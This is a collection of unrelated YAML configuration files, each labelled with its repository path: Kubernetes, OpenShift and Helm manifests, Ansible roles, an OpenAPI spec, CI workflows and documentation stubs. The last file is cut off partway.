kubernetes.io/ingress.class: "nginx"
name: spinnaker-demo
namespace: ${parameters["namespace"]}
labels:
app: spinnaker
team: developers
tier: frontend
phase: ${parameters["phase"]}
version: ${parameters["version"]}
environment: ${parameters["environment"]}
spec:
rules:
- host: '${parameters["host"]}'
http:
paths:
- backend:
serviceName: spinnaker-demo
servicePort: 8000
path: ${parameters["context"]}
|
manifests/demo.yml
|
openapi: "3.0.3"
info:
version: 0.0.2
title: Employee Sample specification
description: Employeee API
contact:
name: <NAME>
url: http://virtualan.io
email: <EMAIL>
license:
name: No license
servers:
- url: https://live.virtualandemo.com
description: Production server (uses live data)
- url: http://localhost:8800
description: Sandbox server (uses test data)
paths:
/employees:
post:
summary: Create a Employee
description: Create a new Employee object.
operationId: createEmployee
tags:
- employee
requestBody:
content:
application/json:
schema:
$ref: "#/components/schemas/Employee"
responses:
'201':
description: Employee created
'400':
description: Employee exists already. Choose another name.
'405':
description: Invalid input.
default:
description: unexpected error
content:
application/json:
schema:
$ref: "#/components/schemas/Error"
/employees/{employeeId}:
get:
summary: The GET Employee
operationId: employeeById
description: Sample path
tags:
- employee
parameters:
- name: employeeId
in: path
required: true
description: The id of the employee
schema:
type: string
responses:
'200':
description: Employee
content:
application/json:
schema:
$ref: "#/components/schemas/Employee"
'400':
description: Employee Invalid ID
'404':
description: Employee not found
default:
description: unexpected error
content:
application/json:
schema:
$ref: "#/components/schemas/Error"
components:
schemas:
Employee:
required:
- name
properties:
id:
type: integer
format: int64
example: 001
name:
type: string
example: Elan
gender:
type: string
example: 0.0.1
Error:
required:
- code
- message
properties:
code:
type: integer
format: int32
example: 404
message:
type: string
example: Unexpected error.
|
samples/virtualan-openapi-mongo/src/main/resources/META-INF/resources/yaml/Employee/Employee.yaml
|
# ------------------- Alertmanager Servcice ------------------- #
kind: Service
apiVersion: v1
metadata:
name: prometheus-alertmanager
namespace: monitoring
spec:
type: NodePort
ports:
- port: 9093
targetPort: 9093
nodePort: 30903
selector:
app: alertmanager
---
# ------------------- Alertmanager ConfigMap: alertmanager.yml ------------------- #
apiVersion: v1
kind: ConfigMap
metadata:
creationTimestamp: null
name: prometheus-alertmanager
namespace: monitoring
data:
alertmanager.yml: |
global:
smtp_smarthost: 'mailhog.monitoring.svc.cluster.local:1025'
smtp_from: '<EMAIL>'
smtp_require_tls: false
smtp_hello: 'k8s-alertmanager'
# Default route
route:
group_by: [cluster, alertname, resource, severity]
# Default receiver
receiver: test-emails
# Child routes
routes:
# Creating a rule for CPU related alerts
- match_re:
resource: ^cpu$
receiver: cpu-mails
# Sub route for critical CPU alerts
routes:
- match:
severity: critical
receiver: crit-mails
# Setting different receivers
receivers:
- name: 'test-emails'
email_configs:
- to: '<EMAIL>'
- name: 'cpu-mails'
email_configs:
- to: '<EMAIL>'
- name: 'crit-mails'
email_configs:
- to: '<EMAIL>'
---
# ------------------- Alertmanager Deployment ------------------- #
apiVersion: apps/v1
kind: Deployment
metadata:
name: prometheus-alertmanager
namespace: monitoring
labels:
app: alertmanager
spec:
selector:
matchLabels:
app: alertmanager
template:
metadata:
name: alertmanager
labels:
app: alertmanager
annotations:
prometheus.io/scrape: "true"
prometheus.io/port: "9093"
prometheus.io/part_of: "true"
spec:
containers:
- name: alertmanager
image: prom/alertmanager:v0.15.2
ports:
- containerPort: 9093
volumeMounts:
- name: alertmanager-rules
mountPath: /etc/alertmanager
volumes:
- name: alertmanager-rules
configMap:
name: prometheus-alertmanager
|
src/100-classic/300-alertmanager-full.yml
|
---
- name: install dependencies
apt:
name: "{{ item }}"
with_items:
- linux-tools-{{ ansible_kernel }} # for cpupower, used in prolog+epilog
when: ansible_os_family == "Debian"
- name: install dependencies
yum:
name: "{{ item }}"
with_items:
- kernel-tools # for cpupower, used in prolog+epilog
when: ansible_os_family == "RedHat"
- name: delete old prolog files
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: absent
with_items:
- prolog.sh
- prolog.d
- prolog-parts.d
- prolog-exclusive.d
tags: prolog
when: slurm_clear_old_prolog_epilog
- name: delete old epilog files
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: absent
with_items:
- epilog.sh
- epilog.d
- epilog-parts.d
- epilog-exclusive.d
- epilog-last-user.d
tags: epilog
when: slurm_clear_old_prolog_epilog
- name: create prolog directories
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: directory
owner: slurm
group: slurm
mode: 0755
with_items:
- prolog.d/
tags:
- prolog
- name: create epilog directories
file:
path: "{{ slurm_config_dir }}/{{ item }}"
state: directory
owner: slurm
group: slurm
mode: 0755
with_items:
- epilog.d/
tags:
- epilog
- name: copy prolog script
template:
src: etc/slurm/prolog.sh
dest: "{{ slurm_config_dir }}/"
mode: 0755
tags:
- prolog
- name: copy prolog parts
template:
src: "{{ item }}"
dest: "{{ slurm_config_dir }}/prolog.d/"
owner: slurm
group: slurm
mode: 0755
with_fileglob: "{{ prolog_fileglob }}"
tags:
- prolog
- name: copy epilog script
template:
src: etc/slurm/epilog.sh
dest: "{{ slurm_config_dir }}/"
mode: 0755
tags:
- epilog
- name: copy epilog parts
template:
src: "{{ item }}"
dest: "{{ slurm_config_dir }}/epilog.d/"
owner: slurm
group: slurm
mode: 0755
with_fileglob: "{{ epilog_fileglob }}"
tags:
- epilog
|
roles/slurm/tasks/prolog_epilog.yml
|
---
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# name: tftpboot_configure/defaults
# description: ALL our default variables for tftpboot_configure go in here
#------------------------------------------------------------------------------
# Packages - All our required packages we need installing
#------------------------------------------------------------------------------
# - variables -
tftp_mirror: archive.ubuntu.com # Where will we pull our linux boot environment from
tftp_proxy: blank # What proxy will we use, if any.
tftp_distro: [ xenial ] # What distribution will we pull
tftp_files: [ initrd.gz, linux ]
ntp_server: pool.ntp.org
atftpd_path: /srv/tftp # What is the path for our tftpd
tftp_source: /srv/tftp_source/ # What is the path where the source pxe config files are placed per server
atftp_user: nobody # What user does this environment get set up as
atftp_group: nogroup # What group does this environment get set up as
preseed_password: <PASSWORD> # Default password placed into pre-seed file
vm_disk_device: vda # Default disk device used in pre-seed
vm_net_iface: ens3 # Default interface used in pre-seed
ssh_key: blank
# These below variables rely on apache being set up and is where the preseed is set up
preseed_apache_url: pxe # What is the url http://server/THISVARHERE
preseed_path: /var/www/pxe # What path
webserver_ip_address: "{{ ansible_default_ipv4.address }}"
server_list: # What is our list of servers
- name: blank
hwaddr: "aa:aa:aa:aa:aa:aa"
distro: xenial
preseed_file: my-preseed-file # Allow a custom preseed on a per server basis
|
multi-node-aio-xenial-ansible/roles/tftpboot_configure/defaults/main.yml
|
name: 'Qodana Scan'
description: 'Scan your projects with Qodana on GitHub. Docs: https://jb.gg/qodana-github-action'
author: 'JetBrains'
branding:
color: "black"
icon: "bar-chart-2"
inputs:
linter:
description: 'Qodana linter – [official Qodana Docker image](#supported-qodana-docker-images).'
required: true
default: "jetbrains/qodana-jvm-community:latest"
project-dir:
description: 'Root directory of the project to be analyzed'
required: false
default: "${{ github.workspace }}"
results-dir:
description: 'Directory to store the analysis results'
required: false
default: "${{ runner.temp }}/qodana/results"
cache-dir:
description: 'Directory to store Qodana caches'
required: false
default: "${{ runner.temp }}/qodana/caches"
idea-config-dir:
description: 'IntelliJ IDEA configuration directory'
required: false
gradle-settings-path:
description: 'Provide path to gradle.properties file. An example: "/your/custom/path/gradle.properties"'
required: false
additional-volumes:
description: 'Mount additional volumes to Docker container'
required: false
additional-env-variables:
description: 'Pass additional environment variables to docker container'
required: false
fail-threshold:
description: 'Set the number of problems that will serve as a quality gate. If this number is reached, the pipeline run is terminated'
required: false
inspected-dir:
description: 'Directory to be inspected. If not specified, the whole project is inspected by default'
required: false
baseline-path:
description: 'Run in baseline mode. Provide the path to an existing SARIF report to be used in the baseline state calculation'
required: false
baseline-include-absent:
description: 'Include the results from the baseline absent in the current Qodana run in the output report'
required: false
default: "false"
changes:
description: 'Inspect uncommitted changes and report new problems'
required: false
default: "false"
script:
description: 'Override the default docker scenario'
required: false
profile-name:
description: 'Name of a profile defined in the project'
required: false
profile-path:
description: 'Absolute path to the profile file'
required: false
upload-result:
description: 'Upload Qodana results as an artifact to the job'
required: false
default: "true"
use-caches:
description: 'Utilize GitHub caches for Qodana runs'
required: false
default: "true"
use-annotations:
description: 'Use annotation to mark the results in the GitHub user interface'
required: false
default: "true"
github-token:
description: 'GitHub token to be used for uploading annotations'
required: false
default: ${{ github.token }}
runs:
using: 'node12'
main: 'dist/index.js'
|
action.yaml
|
name: Standard Pipeline
on:
pull_request:
branches: '**'
push:
branches:
- develop
schedule:
- cron: '0 20 * * 5'
jobs:
outdated:
runs-on: ubuntu-latest
if: startsWith(github.head_ref, 'renovate') == false
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt --user
- name: outdated
run: pip list --outdated --not-required --user | grep . && echo "there are outdated packages" && exit 1 || echo "all packages up to date"
black:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt
- name: black
run: black --check .
isort:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt
- name: isort
run: isort --check .
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install
run: pip install -r requirements.txt
- name: test
run: python -m unittest discover
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
with:
python-version: 3.8
- name: pip install bandit
run: pip install bandit==1.6.2
- name: bandit
run: bandit -r *.py -f json -o report.json
- name: show report
if: ${{ success() || failure() }}
run: cat report.json
- name: upload report
if: ${{ success() || failure() }}
uses: actions/upload-artifact@v2
with:
name: Bandit Security Report
path: report.json
docker:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: docker build
run: docker build -t python-demo .
|
.github/workflows/basic.yml
|
items:
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions'
name: AzureTokenCredentialsOptions
fullName: AzureTokenCredentialsOptions
children:
- '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.environment'
- '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenAudience'
- '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenCache'
langs:
- typeScript
type: interface
summary: ''
package: '@azure/ms-rest-nodeauth'
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.environment'
name: environment
fullName: environment
children: []
langs:
- typeScript
type: property
summary: '{AzureEnvironment} [environment] - environnement pour s’authentifier auprès de Azure.'
optional: true
syntax:
content: 'environment?: Environment'
return:
type:
- Environment
package: '@azure/ms-rest-nodeauth'
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenAudience'
name: tokenAudience
fullName: tokenAudience
children: []
langs:
- typeScript
type: property
summary: "{TokenAudience} [tokenAudience] - le public pour lequel le jeton est demandé. Les valeurs valides sont «\_graphique\_», «\_batch\_», ou toute autre ressource tels que «https://vault.azure.net/».\nSi tokenAudience est «\_graphique\_» puis domaine doit également être fourni et sa valeur ne doit pas être le locataire «\_commune\_» par défaut. Il doit être une chaîne (de préférence dans un format guid)."
optional: true
syntax:
content: 'tokenAudience?: TokenAudience'
return:
type:
- '@azure/ms-rest-nodeauth.TokenAudience'
package: '@azure/ms-rest-nodeauth'
- uid: '@azure/ms-rest-nodeauth.AzureTokenCredentialsOptions.tokenCache'
name: tokenCache
fullName: tokenCache
children: []
langs:
- typeScript
type: property
summary: '{TokenCache} [tokenCache] - le cache de jetons. Valeur par défaut est MemoryCache à partir de la bibliothèque adal.'
optional: true
syntax:
content: 'tokenCache?: adal.TokenCache'
return:
type:
- adal.TokenCache
package: '@azure/ms-rest-nodeauth'
references:
- uid: '@azure/ms-rest-nodeauth.TokenAudience'
name: TokenAudience
spec.typeScript:
- name: TokenAudience
fullName: TokenAudience
uid: '@azure/ms-rest-nodeauth.TokenAudience'
|
docs-ref-autogen/@azure/ms-rest-nodeauth/AzureTokenCredentialsOptions.yml
|
items:
- uid: vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions
name: ExtensionFilterOptions
fullName: ExtensionFilterOptions
children:
- vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.All
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.None
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.Bundle
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.AccountAssignment
- >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.ImplicitAssignment
langs:
- typeScript
type: enum
summary: ''
source:
path: vss.d.ts
startLine: 27476
remote:
path: typings\vss.d.ts
repo: 'https://github.com/Microsoft/vss-web-extension-sdk.git'
branch: master
package: vss-web-extension-sdk
module: VSS/Licensing/Contracts
- uid: vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.All
name: All
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: -1
module: VSS/Licensing/Contracts
- uid: vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.None
name: None
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 1
module: VSS/Licensing/Contracts
- uid: >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.Bundle
name: Bundle
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 2
module: VSS/Licensing/Contracts
- uid: >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.AccountAssignment
name: AccountAssignment
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 4
module: VSS/Licensing/Contracts
- uid: >-
vss-web-extension-sdk.VSS.Licensing.Contracts.ExtensionFilterOptions.ImplicitAssignment
name: ImplicitAssignment
children: []
langs:
- typeScript
summary: ''
type: field
numericValue: 8
module: VSS/Licensing/Contracts
|
docs-ref-autogen/vss-web-extension-sdk/VSS.Licensing.Contracts.ExtensionFilterOptions.yml
|
- include: compare_base.yml
with_items: "{{ execute_compare_base_features }}"
when: execute_compare_base
# Get runtime status for Master
- name: Get all reverse proxies in {{ master_hostname }}
ibm.isam.isam:
appliance: "{{ master_hostname }}"
log: "{{ log_level | default('INFO') }}"
force: "{{ force | default(False) }}"
action: ibmsecurity.isam.web.runtime.process.get
run_once: True
register: master_web_runtime
- include: compare_base.yml
with_items: "{{ execute_compare_wga_features }}"
when: execute_compare_wga and ('wga' in master_web_runtime['ansible_facts']['activations'])
- include: compare_base.yml
with_items: "{{ execute_compare_mga_features }}"
when: execute_compare_mga and ('mga' in master_web_runtime['ansible_facts']['activations'])
- include: compare_base.yml
with_items: "{{ execute_compare_fed_features }}"
when: execute_compare_fed and ('federation' in master_web_runtime['ansible_facts']['activations'])
- include: compare_base.yml
with_items: "{{ execute_compare_mga_or_fed_features }}"
when: (execute_compare_fed and ('federation' in master_web_runtime['ansible_facts']['activations'])) or (execute_compare_mga and ('mga' in master_web_runtime['ansible_facts']['activations']))
# Compare runtime configuration files of an appliance
- include: compare_runtime_config.yml
with_items:
- pd.conf
- ivmgrd.conf
- ldap.conf
loop_control:
loop_var: resource_id
when: execute_compare_web_runtime and master_web_runtime['data']['modecode'] != '-1'
# Get all reverse proxies in master appliance
- name: Get all reverse proxies in {{ master_hostname }}
ibm.isam.isam:
appliance: "{{ master_hostname }}"
log: "{{ log_level | default('INFO') }}"
force: "{{ force | default(False) }}"
action: ibmsecurity.isam.web.reverse_proxy.instance.get
when: execute_compare_reverseproxy and master_web_runtime['data']['modecode'] != '-1' and ('wga' in master_web_runtime['ansible_facts']['activations'])
ignore_errors: True
run_once: True
register: master_rps
- include: compare_reverseproxy_config.yml
with_items: "{{ master_rps['data'] }}"
loop_control:
loop_var: reverseproxy
when: execute_compare_reverseproxy and master_web_runtime['data']['modecode'] != '-1' and ('wga' in master_web_runtime['ansible_facts']['activations'])
# Get all Certificate Databases in master appliance
- name: Get all certificate stores in {{ master_hostname }}
ibm.isam.isam:
appliance: "{{ master_hostname }}"
log: "{{ log_level | default('INFO') }}"
force: "{{ force | default(False) }}"
action: ibmsecurity.isam.base.ssl_certificates.certificate_databases.get_all
when: execute_compare_certs
ignore_errors: True
run_once: True
register: master_cert_dbs
- include: compare_certificate_databases.yml
with_items: "{{ master_cert_dbs['data'] }}"
loop_control:
loop_var: cert_db
when: execute_compare_certs
|
roles/execute_compare/tasks/main.yml
|
fields:
- description
keywords:
- abattoir
- animal
- bull
- canine
- cat
- cattle
- chicken
- cow
- dog
- duck
- farm
- feline
- geese
- goat
- goose
- hen
- kitten
- livestock
- pig
- poultry
- puppies
- puppy
- swine
- turkey
- fish
- lamb
- sheep
- veal
- fishery
# Below optained from https://www.mla.com.au/general/glossary/#glossarySection_A
- agent # Sells and buys cattle on behalf of clients
- AuctionsPlus # Internet based livestock auction system
- bobby
- calf
- backgrounder # A cattle producer who produces young cattle ready for lot feeding
- blue tag # A tail tag on a cow at a physical market
- boning room # Area of an abattoir where the carcase is cut into smaller portions
- beef
- carcase
- CL # Chemical lean
- chemical lean
- conditioning
- crossbred
- crossbreeding
- CWE # Carcase weight equivalent
- CWT # Carcase weight
- dam # Mother of a particular calf
- damara # South African fat-tailed meat breed of sheep
- $/head # Dollars per head of lives stock. Units by which cattle are sold at store sale.
- DCW # Dressed carcase weight
- DWT # Dressed weight
- ewe # Female sheep with more than two permanent teeth
- EYCI # Eastern Young Cattle Indicator, used as a general cattle market benchmark
- fat score # Measure of fat cover across an animal's ribs and rump
- feeders
- feedlot
- grainfed
- grassfed
- grazier # A farmer which raises livestock such as sheep or cattle
- mutton
- heifer
- HGP # Hormone growth promotant
- hogget # Castrated male and female sheep with no 'ram like' characteristics and up to two permanent teeth.
- ox
- killing # Killing floor, etc etc
- LWT # Liveweight - the weight of a live animal
- LMO # Livestock market officer
- longfed # An animal that is grainfed, in a feedlot, for an extended period of time.
- lotfed
- MSA # Meat Standars Australia
- Meatworks
- MLA # Meat and Livestock Australia
- NLIS # National Livestock Identification System
- NLRS # National Livestock Reporting Service
- NSM # Non-station mated - refers to when a cow or heifer has not been intentionally exposed to a bull
- OTH # Over the hooks - refers to the marketing of cattle/sheep/lambs directly from the farm to an abattoir where a producer is paid for the value of the carcase based on a sliding grid
- pastoralist
- PTIC # Pregnancy tested in calf
- PTNIC # Pregnancy tested not in calf
- ram
- saleyard
- second-cross # The breed developed by mating a meat breed ram with a first-cross ewe
- shortfed
- slaughter
- steer
- yardings # Number of cattle offered for sale at a saleyard auction
- yearling # Young animal, fully weaned without permanent incisor teeth
|
config/planning-alerts.yaml
|
kind: Template
apiVersion: v1
labels:
app: cloud9
template: cloud9
metadata:
name: cloud9
annotations:
openshift.io/display-name: "Cloud9 IDE"
description: "Cloud9 IDE template.\n\nWARNING: Any data stored will be lost upon pod destruction."
openshift.io/long-description: "Cloud9 IDE template.\n\nWARNING: Any data stored will be lost upon pod destruction."
tags: "ide,development,quickstart"
iconClass: "fa fa-code"
openshift.io/provider-display-name: "A-State Computer Science Department"
objects:
- apiVersion: v1
kind: Service
metadata:
name: cloud9
spec:
ports:
- name: http
port: 8181
protocol: TCP
targetPort: 8181
selector:
app: cloud9
- apiVersion: v1
kind: Route
metadata:
name: cloud9
spec:
tls:
termination: edge
to:
kind: Service
name: cloud9
- apiVersion: v1
kind: DeploymentConfig
metadata:
name: cloud9
spec:
replicas: 1
selector:
app: cloud9
strategy:
type: Rolling
template:
metadata:
labels:
app: cloud9
spec:
containers:
- env:
name: cloud9
image: 'cloud9:latest'
imagePullPolicy: Always
livenessProbe:
failureThreshold: 11
initialDelaySeconds: 80
periodSeconds: 5
successThreshold: 1
tcpSocket:
port: 8181
timeoutSeconds: 30
ports:
- containerPort: 8181
protocol: TCP
volumeMounts:
- mountPath: '/workspace'
name: cloud9-data
restartPolicy: Always
volumes:
- name: cloud9-data
persistentVolumeClaim:
claimName: cloud9-data
triggers:
- type: ConfigChange
- type: "ImageChange"
imageChangeParams:
automatic: true
from:
kind: "ImageStreamTag"
name: "cloud9:latest"
namespace: "openshift"
containerNames:
- "cloud9"
- kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: cloud9-data
labels:
app: cloud9
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
|
v3/cloud9.yaml
|
heat_template_version: pike
description: >
Tenant IPv6 network.
parameters:
# the defaults here work for static IP assignment (IPAM) only
TenantNetCidr:
# OpenStack uses the EUI-64 address format, which requires a /64 prefix
default: 'fd00:fd00:fd00:5000::/64'
description: Cidr for the tenant network.
type: string
TenantNetValueSpecs:
default: {'provider:physical_network': 'tenant', 'provider:network_type': 'flat'}
description: Value specs for the tenant network.
type: json
TenantNetAdminStateUp:
default: false
description: This admin state of of the network.
type: boolean
TenantNetShared:
default: false
description: Whether this network is shared across all tenants.
type: boolean
TenantNetName:
default: tenant
description: The name of the tenant network.
type: string
TenantSubnetName:
default: tenant_subnet
description: The name of the tenant subnet in Neutron.
type: string
TenantAllocationPools:
default: [{'start': 'fd00:fd00:fd00:5000::10', 'end': 'fd00:fd00:fd00:5000:ffff:ffff:ffff:fffe'}]
description: Ip allocation pool range for the tenant network.
type: json
IPv6AddressMode:
default: dhcpv6-stateful
description: Neutron subnet IPv6 address mode
type: string
IPv6RAMode:
default: dhcpv6-stateful
description: Neutron subnet IPv6 router advertisement mode
type: string
resources:
TenantNetwork:
type: OS::Neutron::Net
properties:
admin_state_up: {get_param: TenantNetAdminStateUp}
name: {get_param: TenantNetName}
shared: {get_param: TenantNetShared}
value_specs: {get_param: TenantNetValueSpecs}
TenantSubnet:
type: OS::Neutron::Subnet
properties:
ip_version: 6
ipv6_address_mode: {get_param: IPv6AddressMode}
ipv6_ra_mode: {get_param: IPv6RAMode}
cidr: {get_param: TenantNetCidr}
name: {get_param: TenantSubnetName}
network: {get_resource: TenantNetwork}
allocation_pools: {get_param: TenantAllocationPools}
gateway_ip: null
outputs:
OS::stack_id:
description: Neutron tenant network
value: {get_resource: TenantNetwork}
|
network/tenant_v6.yaml
|
infra:
clusterName: "kubernetes"
cloudControllerManager:
enabled: true
allocateNodeCidrs: "true"
# bindAddress: "0.0.0.0"
caCertDir: "/etc/ssl"
# certDir: "/path/to/certs"
cloudConfig: "/etc/kubernetes/azure.json"
# cloudConfigSecretName: "azure-cloud-provider"
clusterCIDR: "10.244.0.0/16"
configureCloudRoutes: "true" # "false" for Azure CNI and "true" for other network plugins
# contentionProfiling: "true"
# controllerStartInterval: "2m"
# enableDynamicReloading: "true"
# http2MaxStreamsPerConnection: "47"
imageRepository: "mcr.microsoft.com/oss/kubernetes"
imageName: "azure-cloud-controller-manager"
#imageTag: "v1.23.11"
imagePullPolicy: "IfNotPresent"
# kubeAPIBurst: "100"
# kubeAPIContentType: "application/vnd.kubernetes.protobuf"
# kubeAPIQPS: "50.0"
# kubeconfig: "/kubeconfig"
leaderElect: "true"
# leaderElectLeaseDuration: "30s"
# leaderElectRenewDeadline: "15s"
# leaderElectRetryPeriod: "5s"
# leaderElectResourceLock: "configmap"
logVerbosity: "2"
# master: "192.168.4.20"
# minResyncPeriod: "100m"
# nodeStatusUpdateFrequency: "10m"
port: 10267
replicas: 1
# profiling: "false"
routeReconciliationPeriod: "10s"
# securePort: 10001
# useServiceAccountCredentials: "false"
containerResourceManagement:
requestsCPU: "100m"
requestsMem: "128Mi"
limitsCPU: "4"
limitsMem: "2Gi"
cloudNodeManager:
enabled: true
imageRepository: "mcr.microsoft.com/oss/kubernetes"
imageName: "azure-cloud-node-manager"
#imageTag: "v1.23.11"
imagePullPolicy: "IfNotPresent"
# cloudConfig: "/etc/kubernetes/azure.json"
# kubeAPIBurst: "100"
# kubeAPIContentType: "application/vnd.kubernetes.protobuf"
# kubeAPIQPS: "50.0"
# kubeconfig: "/kubeconfig"
# master: "192.168.4.20"
# minResyncPeriod: "100m"
# nodeStatusUpdateFrequency: "10m"
# waitRoutes: "false"
# useInstanceMetadata: "true"
containerResourceManagement:
requestsCPU: "50m"
requestsMem: "50Mi"
limitsCPU: "2"
limitsMem: "512Mi"
requestsCPUWin: "50m"
requestsMemWin: "50Mi"
limitsCPUWin: "2"
limitsMemWin: "512Mi"
|
helm/cloud-provider-azure/values.yaml
|
---
- name: Creating Directory Structure
file:
path: "{{ item }}"
state: directory
with_items:
- ~/.config/pet
- ~/.local/bin
- ~/.ssh
- ~/bin
- ~/work/media/images
- ~/work/media/videos
- ~/work/others
- ~/work/programming/projects
- ~/work/programming/sources
- ~/work/tmp
- ~/work/tools
- ~/work/vms
- ~/work/warehouse
- name: Creating ~/work/{documents, downloads}
block:
- name: Moving Files
command: mv "{{ item.src }}" "{{ item.dst }}"
args:
creates: "{{ item.dst }}"
with_items:
- { src: ~/Documents, dst: ~/work/documents }
- { src: ~/Downloads, dst: ~/work/downloads }
- name: Creating Symlinks
file:
src: "{{ item.src }}"
dest: "{{ item.symlink }}"
state: link
with_items:
- { src: ~/work/documents, symlink: ~/Documents }
- { src: ~/work/downloads, symlink: ~/Downloads }
- name: Downloading Things
block:
- name: Firefox
get_url:
backup: yes
url: https://download.mozilla.org/?product=firefox-nightly-latest-ssl&os=linux64&lang=en-US
dest: ~/work/tools/firefox.tar.bz2
- name: Extracting Firefox
unarchive:
remote_src: yes
src: ~/work/tools/firefox.tar.bz2
dest: ~/work/tools/
creates: ~/work/tools/firefox/
- name: Thunderbird
get_url:
backup: yes
url: https://download.mozilla.org/?product=thunderbird-beta-latest-SSL&os=linux64&lang=en-US
dest: ~/work/tools/thunderbird.tar.bz2
- name: Extracting Thunderbird
unarchive:
remote_src: yes
src: ~/work/tools/thunderbird.tar.bz2
dest: ~/work/tools/
creates: ~/work/tools/thunderbird/
- name: Pet
get_url:
backup: yes
url: https://github.com/knqyf263/pet/releases/download/v0.3.6/pet_0.3.6_linux_amd64.tar.gz
dest: ~/work/tools/pet.tar.gz
checksum: sha256:60f977ec23b219551186edab88264a5a3475663007a3cc0f0873785e603335bb
- name: Extracting Pet
unarchive:
remote_src: yes
src: ~/work/tools/pet.tar.gz
dest: ~/bin/
creates: ~/bin/pet/
extra_opts:
- --transform
- s,^,pet/,
- name: FiraCode Font
get_url:
backup: yes
url: https://github.com/tonsky/FiraCode/releases/download/2/FiraCode_2.zip
dest: ~/work/tools/FiraCode.zip
checksum: sha256:60d5b1106b708cc134c521aae4e503bb1d2ec3c9bf8ad978f2c659820505d492
- name: Oh-My-Zsh
block:
- git:
repo: https://github.com/robbyrussell/oh-my-zsh
dest: ~/.oh-my-zsh
- git:
repo: https://github.com/zsh-users/zsh-autosuggestions
dest: ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions
- git:
repo: https://github.com/zsh-users/zsh-syntax-highlighting
dest: ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting
- user:
name: "{{ ansible_user }}"
shell: /bin/zsh
become: true
become_user: root
- name: Installing vscode Extensions
command: code --install-extension "{{ item }}"
with_items:
- bungcip.better-toml
- eamodio.gitlens
- lextudio.restructuredtext
- ms-azuretools.vscode-docker
- ms-python.python
- vscode-icons-team.vscode-icons
- name: Copying Files
template:
backup: yes
src: "{{ item.src }}"
dest: "{{ item.dst }}"
mode: "{{ item.mode | default('0644') }}"
with_items:
- { src: files/gapull , dst: ~/bin/gapull , mode: a+x }
- { src: files/gapush , dst: ~/bin/gapush , mode: a+x }
- { src: files/zsh-shortcuts , dst: ~/bin/zsh-shortcuts , mode: a+x }
- { src: files/ssh-config , dst: ~/.ssh/config , mode: "0600" }
- { src: files/curlrc , dst: ~/.curlrc }
- { src: files/gdbinit , dst: ~/.gdbinit }
- { src: files/gitconfig.j2 , dst: ~/.gitconfig }
- { src: files/gitmessage , dst: ~/.gitmessage }
- { src: files/pet-snippets.toml.j2 , dst: ~/.config/pet/snippet.toml }
- { src: files/pet.zsh , dst: ~/.pet.zsh }
- { src: files/psqlrc , dst: ~/.psqlrc }
- { src: files/tmux.conf , dst: ~/.tmux.conf }
- { src: files/vimrc , dst: ~/.vimrc }
- { src: files/wgetrc , dst: ~/.wgetrc }
- { src: files/zprofile , dst: ~/.zprofile }
- { src: files/zshenv , dst: ~/.zshenv }
- { src: files/zshrc , dst: ~/.zshrc }
|
roles/workstation/tasks/user/user.yml
|
oro_behat_extension:
suites:
OroCalendarBundle:
contexts:
- Oro\Bundle\CalendarBundle\Tests\Behat\Context\FeatureContext
- Oro\Bundle\ConfigBundle\Tests\Behat\Context\FeatureContext
- Oro\Bundle\DataGridBundle\Tests\Behat\Context\GridContext
- Oro\Bundle\EmailBundle\Tests\Behat\Context\EmailContext
- Oro\Bundle\FormBundle\Tests\Behat\Context\FormContext
- Oro\Bundle\TestFrameworkBundle\Tests\Behat\Context\OroMainContext
- OroSearchBundle::SearchContext
paths:
- '@OroCalendarBundle/Tests/Behat/Features'
pages:
Default Calendar View:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Page\DefaultCalendarView
route: oro_calendar_view_default
elements:
Calendar:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\Calendar
selector: "div[id^='calendar']"
Calendar Event:
